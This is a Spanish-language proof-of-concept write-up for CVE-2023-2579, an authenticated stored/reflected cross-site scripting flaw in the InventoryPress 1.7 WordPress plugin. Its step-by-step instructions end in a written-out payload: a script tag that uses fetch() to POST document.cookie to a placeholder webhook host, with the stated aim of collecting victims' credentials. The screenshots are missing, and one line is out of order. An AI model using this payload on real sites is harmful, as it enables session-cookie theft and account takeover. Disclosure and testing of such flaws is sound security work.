
PoC para CVE-2023-2579
El ID CVE-2023-2579 fue reservado y el PoC fue publicado en el sitio web de WPScan: https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe
Título: Cross-Site Scripting Reflejado Autenticado en el Plugin InventoryPress para WordPress CMS
Fecha: 2023-04-21
Autor: Danilo Albuquerque
Vendor Homepage: https://wordpress.org
Software Link: https://wordpress.org/download
Versión: WordPress 6.2
Nombre y versión del plugin: InventoryPress 1.7
Probado en: Brave (Versión 1.50.119 Chromium: 112.0.5615.121 (Versión Oficial) 64 bits)
Cuando hagas todo eso y actualices la página actual, te aparecerá la ventana emergente de alerta con el mensaje.
Ve a la página donde puedes agregar los elementos al inventario:

Agrega el payload malicioso en el campo de entrada "Descripción" del formulario:

Accede al enlace del nuevo elemento generado por el plugin:

Una vez realizada la solicitud, se muestra la ventana emergente de alerta:

Agrega el siguiente payload para robar las cookies en el campo de entrada "Descripción": <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Luego publica el nuevo elemento, o actualiza uno existente;
Dispara y obtén las credenciales en el sitio de Webhook
Agregando el payload y publicando el elemento (o actualizándolo):

Disparando y obteniendo las credenciales:
